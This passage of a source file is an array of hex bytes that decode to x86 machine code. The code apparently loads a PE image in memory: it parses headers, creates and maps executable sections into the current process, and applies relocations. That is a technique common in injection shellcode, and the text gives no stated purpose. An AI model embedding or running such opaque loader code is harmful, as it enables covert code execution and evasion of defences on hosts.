710 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xa0, 0x89, 0x4c, 0x24, 0x0c, 0x8b,
711 0x4d, 0xa4, 0x89, 0x4c, 0x24, 0x10, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
712 0xec, 0x1c, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84, 0xd4,
713 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00,
714 0x8b, 0x55, 0xb0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b,
715 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x89,
716 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xe9, 0xa7, 0x02, 0x00, 0x00,
717 0x8b, 0x45, 0x10, 0xc7, 0x40, 0x1c, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x98,
718 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x02, 0x00, 0x00,
719 0x8d, 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54,
720 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x66, 0xe8, 0xff,
721 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8d, 0x95,
722 0x76, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
723 0x89, 0x45, 0xec, 0x83, 0x7d, 0xec, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00,
724 0x00, 0x00, 0xe9, 0x51, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90,
725 0x0c, 0x03, 0x00, 0x00, 0x8d, 0x85, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44,
726 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
727 0xe8, 0x1a, 0xe8, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00,
728 0x00, 0x00, 0x8d, 0x95, 0x76, 0xfd, 0xff, 0xff, 0x89, 0x14, 0x24, 0xff,
729 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xe8, 0x83, 0x7d, 0xe8, 0x00, 0x0f,
730 0x84, 0xf2, 0x01, 0x00, 0x00, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x14, 0x8b,
731 0x00, 0x8b, 0x40, 0x44, 0x8b, 0x55, 0x10, 0x8d, 0x4a, 0x18, 0x8b, 0x55,
732 0x10, 0x8b, 0x52, 0x14, 0x89, 0x4c, 0x24, 0x08, 0x8b, 0x4d, 0xec, 0x89,
733 0x4c, 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89,
734 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0xa7, 0x01, 0x00, 0x00,
735 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f, 0xb6,
736 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0x0e, 0x01, 0x00,
737 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00, 0x8d, 0x85,
738 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04,
739 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x84, 0xe7, 0xff, 0xff, 0x8b,
740 0x45, 0x08, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x70, 0xfd,
741 0xff, 0xff, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0x76, 0xfd, 0xff, 0xff,
742 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xe4, 0x8b,
743 0x45, 0x08, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x70, 0xfd,
744 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00,
745 0x00, 0x00, 0xc7, 0x04, 0x24, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83,
746 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84, 0x94,
747 0x00, 0x00, 0x00, 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x7a,
748 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x84,
749 0x8d, 0x0c, 0x95, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x01, 0xca,
750 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
751 0xd0, 0x66, 0xc7, 0x45, 0xc8, 0x08, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80,
752 0x8c, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xc8, 0x89, 0x54, 0x24, 0x08, 0x8d,
753 0x55, 0x84, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24,
754 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00,
755 0x79, 0x1b, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b,
756 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xc7, 0x45,
757 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x84, 0x83, 0xc0, 0x01, 0x89,
758 0x45, 0x84, 0x8b, 0x45, 0x84, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x39,
759 0xd0, 0x0f, 0x82, 0x75, 0xff, 0xff, 0xff, 0x83, 0x7d, 0xf0, 0x00, 0x78,
760 0x7a, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x18, 0x8b, 0x00, 0x8b, 0x80, 0xe4,
761 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x18, 0x8d, 0x4d, 0xb8,
762 0x89, 0x4c, 0x24, 0x24, 0x8b, 0x4d, 0xf4, 0x89, 0x4c, 0x24, 0x20, 0x8b,
763 0x4d, 0x98, 0x89, 0x4c, 0x24, 0x10, 0x8b, 0x4d, 0x9c, 0x89, 0x4c, 0x24,
764 0x14, 0x8b, 0x4d, 0xa0, 0x89, 0x4c, 0x24, 0x18, 0x8b, 0x4d, 0xa4, 0x89,
765 0x4c, 0x24, 0x1c, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7,
766 0x44, 0x24, 0x08, 0x18, 0x01, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c,
767 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x28, 0x89, 0x45,
768 0xf0, 0x83, 0x7d, 0xf4, 0x00, 0x74, 0x14, 0x8b, 0x45, 0x08, 0x8b, 0x80,
769 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0,
770 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00,
771 0x8b, 0x55, 0xe8, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b,
772 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89,
773 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x01, 0x00, 0x00, 0x00,
774 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b,
775 0x45, 0x0c, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
776 0x8b, 0x40, 0x18, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
777 0x52, 0x18, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
778 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00, 0x00, 0x8b,
779 0x45, 0x0c, 0x8b, 0x40, 0x1c, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
780 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
781 0x52, 0x1c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
782 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x1c, 0x00, 0x00, 0x00, 0x00, 0x8b,
783 0x45, 0x0c, 0x8b, 0x40, 0x14, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
784 0x8b, 0x40, 0x14, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
785 0x52, 0x14, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
786 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x14, 0x00, 0x00, 0x00, 0x00, 0x8b,
787 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x85, 0xc0, 0x74, 0x68, 0x8b, 0x45, 0x0c,
788 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x50, 0x8b, 0x55, 0x0c, 0x8b,
789 0x4a, 0x10, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24, 0x04,
790 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4, 0x8b,
791 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x2c, 0x8b, 0x55,
792 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
793 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b,
794 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24, 0xff,
795 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
796 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x10, 0x85,
797 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x10, 0x8b, 0x00, 0x8b,
798 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x10, 0x89, 0x14, 0x24, 0xff,
799 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
800 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x0c, 0x85,
801 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x0c, 0x8b, 0x00, 0x8b,
802 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x0c, 0x89, 0x14, 0x24, 0xff,
803 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
804 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85,
805 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b,
806 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x04, 0x89, 0x14, 0x24, 0xff,
807 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
808 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x85, 0xc0,
809 0x74, 0x23, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x40, 0x08,
810 0x8b, 0x55, 0x0c, 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
811 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x00, 0x00, 0x00, 0x00,
812 0x00, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x81, 0xec,
813 0x4c, 0x04, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x00, 0x00,
814 0x00, 0x00, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xb8,
815 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x00, 0x00,
816 0x00, 0x00, 0xc7, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
817 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8,
818 0x01, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x8b, 0x45, 0x0c, 0x05, 0x28, 0x05,
819 0x00, 0x00, 0x89, 0x45, 0xb0, 0x8b, 0x45, 0xb0, 0x89, 0x45, 0xac, 0x8b,
820 0x45, 0xac, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0xb0, 0x01, 0xd0,
821 0x89, 0x45, 0xa8, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x38, 0xc7, 0x04, 0x24,
822 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xa4,
823 0x8b, 0x45, 0xa4, 0x89, 0x45, 0xa0, 0x8b, 0x45, 0xa0, 0x8b, 0x40, 0x3c,
824 0x89, 0xc2, 0x8b, 0x45, 0xa4, 0x01, 0xd0, 0x89, 0x45, 0x9c, 0x8b, 0x45,
825 0xa8, 0x0f, 0xb7, 0x50, 0x04, 0x8b, 0x45, 0x9c, 0x0f, 0xb7, 0x40, 0x04,
826 0x66, 0x39, 0xc2, 0x0f, 0x85, 0x2a, 0x11, 0x00, 0x00, 0x8b, 0x45, 0xa8,
827 0x8b, 0x40, 0x50, 0xba, 0x00, 0x00, 0x00, 0x00, 0x89, 0x85, 0x20, 0xfc,
828 0xff, 0xff, 0x89, 0x95, 0x24, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xa8, 0x8b,
829 0x80, 0xa4, 0x00, 0x00, 0x00, 0x89, 0x45, 0x98, 0x83, 0x7d, 0x98, 0x00,
830 0x0f, 0x95, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0x94, 0x83, 0x7d, 0x94,
831 0x00, 0x75, 0x0c, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x34, 0x89, 0x85, 0x1c,
832 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00,
833 0x00, 0x84, 0xc0, 0x75, 0x59, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x1c,
834 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x14,
835 0x00, 0x00, 0x00, 0x08, 0xc7, 0x44, 0x24, 0x10, 0x40, 0x00, 0x00, 0x00,
836 0x8d, 0x85, 0x20, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44,
837 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00,
838 0x0f, 0x00, 0x8d, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8,
839 0x7d, 0x32, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f,
840 0x89, 0x63, 0x01, 0x00, 0x00, 0xe9, 0xac, 0x10, 0x00, 0x00, 0x8b, 0x45,
841 0x08, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x81, 0xc2,
842 0xfb, 0x05, 0x00, 0x00, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0xdc, 0xfb,
843 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0xc7, 0x85,
844 0xec, 0xfb, 0xff, 0xff, 0x18, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf0, 0xfb,
845 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf8, 0xfb, 0xff, 0xff,
846 0x40, 0x00, 0x00, 0x00, 0x8d, 0x85, 0xdc, 0xfb, 0xff, 0xff, 0x89, 0x85,
847 0xf4, 0xfb, 0xff, 0xff, 0xc7, 0x85, 0xfc, 0xfb, 0xff, 0xff, 0x00, 0x00,
848 0x00, 0x00, 0xc7, 0x85, 0x00, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
849 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x2c, 0xc7, 0x44, 0x24, 0x28, 0x00,
850 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x24, 0x00, 0x00, 0x00, 0x00, 0xc7,
851 0x44, 0x24, 0x20, 0x40, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x01,
852 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x01, 0x00, 0x00, 0x00, 0xc7,
853 0x44, 0x24, 0x14, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
854 0x00, 0x00, 0x00, 0x8d, 0x85, 0xe4, 0xfb, 0xff, 0xff, 0x89, 0x44, 0x24,
855 0x0c, 0x8d, 0x85, 0xec, 0xfb, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0xc7,
856 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x80, 0x8d, 0x85, 0x04, 0xfc, 0xff,
857 0xff, 0x89, 0x04, 0x24, 0xe8, 0xb1, 0x32, 0x00, 0x00, 0x89, 0x45, 0x90,
858 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0xac, 0x0f, 0x00, 0x00, 0x8b, 0x85,
859 0x04, 0xfc, 0xff, 0xff, 0x83, 0xf8, 0xff, 0x0f, 0x84, 0x9d, 0x0f, 0x00,
860 0x00, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0x8f,
861 0x0f, 0x00, 0x00, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4,
862 0x89, 0x54, 0x24, 0x1c, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14,
863 0x00, 0x00, 0x00, 0x01, 0xc7, 0x44, 0x24, 0x10, 0x02, 0x00, 0x00, 0x00,
864 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
865 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00, 0x0f, 0x00,
866 0x8d, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x2f, 0x31,
867 0x00, 0x00, 0x89, 0x45, 0x90, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x8b,
868 0x55, 0xb4, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0x86, 0x31,
869 0x00, 0x00, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x29, 0x0f, 0x00, 0x00,
870 0x8b, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24,
871 0x28, 0xc7, 0x44, 0x24, 0x24, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
872 0x20, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x02, 0x00, 0x00,
873 0x00, 0x8d, 0x95, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x18, 0xc7,
874 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
875 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d,
876 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
877 0x04, 0xff, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xc7, 0x30, 0x00,
878 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0xbe, 0x0e,
879 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
880 0xb3, 0x0e, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05,
881 0x00, 0x00, 0x84, 0xc0, 0x74, 0x5e, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
882 0x89, 0x85, 0x14, 0xfc, 0xff, 0xff, 0x8b, 0x85, 0x18, 0xfc, 0xff, 0xff,
883 0x89, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24,
884 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7,
885 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff,
886 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x85, 0x14, 0xfc, 0xff, 0xff, 0x89,
887 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd7,
888 0x30, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88,
889 0x4a, 0x0e, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85,
890 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xb0, 0x89,
891 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0xa3, 0x2a, 0x00, 0x00, 0x8b,
892 0x45, 0xa8, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xd0, 0x8b, 0x45, 0xa8,
893 0x01, 0xd0, 0x83, 0xc0, 0x18, 0x89, 0x45, 0x8c, 0xc7, 0x45, 0xc4, 0x00,
894 0x00, 0x00, 0x00, 0xeb, 0x67, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0,
895 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0x8c, 0x01,
896 0xd0, 0x8b, 0x50, 0x10, 0x8b, 0x4d, 0xc4, 0x89, 0xc8, 0xc1, 0xe0, 0x02,
897 0x01, 0xc8, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x8b, 0x45, 0x8c, 0x01, 0xc8,
898 0x8b, 0x48, 0x14, 0x8b, 0x45, 0xb0, 0x8d, 0x1c, 0x01, 0x8b, 0xb5, 0x1c,
899 0xfc, 0xff, 0xff, 0x8b, 0x4d, 0xc4, 0x89, 0xc8, 0xc1, 0xe0, 0x02, 0x01,
900 0xc8, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x8b, 0x45, 0x8c, 0x01, 0xc8, 0x8b,
901 0x40, 0x0c, 0x01, 0xf0, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
902 0x89, 0x04, 0x24, 0xe8, 0x22, 0x2a, 0x00, 0x00, 0x83, 0x45, 0xc4, 0x01,
903 0x8b, 0x45, 0xa8, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x45,
904 0xc4, 0x72, 0x8a, 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xa8,
905 0x8b, 0x40, 0x34, 0xf7, 0xd8, 0x01, 0xd0, 0x89, 0x45, 0x88, 0x83, 0x7d,
906 0x94, 0x00, 0x0f, 0x84, 0x52, 0x01, 0x00, 0x00, 0x83, 0x7d, 0x88, 0x00,
907 0x0f, 0x84, 0x48, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x80, 0xa0,
908 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
909 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xcc, 0xe9, 0x04,
910 0x01, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x83, 0xc0, 0x08, 0x89, 0x45, 0xd0,
911 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x8b, 0x10, 0x8b, 0x45,
912 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x01,
913 0xc2, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x50, 0x39, 0xc2, 0x0f, 0x83, 0xb6,
914 0x00, 0x00, 0x00, 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xcc,
915 0x8b, 0x08, 0x8b, 0x45, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f,
916 0x0f, 0xb7, 0xc0, 0x01, 0xc8, 0x01, 0xd0, 0x89, 0x45, 0x80, 0x8b, 0x45,
917 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x11,
918 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0x01, 0xc2, 0x8b, 0x45,
919 0x80, 0x89, 0x10, 0xeb, 0x78, 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01,
920 0x83, 0xe0, 0xf0, 0x3c, 0x30, 0x75, 0x11, 0x8b, 0x45, 0x80, 0x8b, 0x10,
921 0x8b, 0x45, 0x88, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb, 0x59,
922 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x10,
923 0x75, 0x17, 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0xc1, 0xe8,
924 0x10, 0x0f, 0xb7, 0xc0, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb,
925 0x34, 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c,
926 0x20, 0x75, 0x14, 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0x0f,
927 0xb7, 0xc0, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb, 0x12, 0x8b,
928 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f,
929 0x85, 0xc9, 0x0b, 0x00, 0x00, 0x83, 0x45, 0xd0, 0x02, 0x8b, 0x45, 0xcc,
930 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xcc, 0x01, 0xd0, 0x39, 0x45, 0xd0, 0x0f,
931 0x85, 0x10, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xd0, 0x89, 0x45, 0xcc, 0x8b,
932 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x4d, 0x84, 0x8b, 0x55, 0x98, 0x01,
933 0xca, 0x01, 0xd0, 0x39, 0x45, 0xcc, 0x73, 0x0e, 0x8b, 0x45, 0xcc, 0x8b,
934 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85, 0xd9, 0xfe, 0xff, 0xff, 0x8b, 0x45,
935 0xa8, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x83, 0x7d,
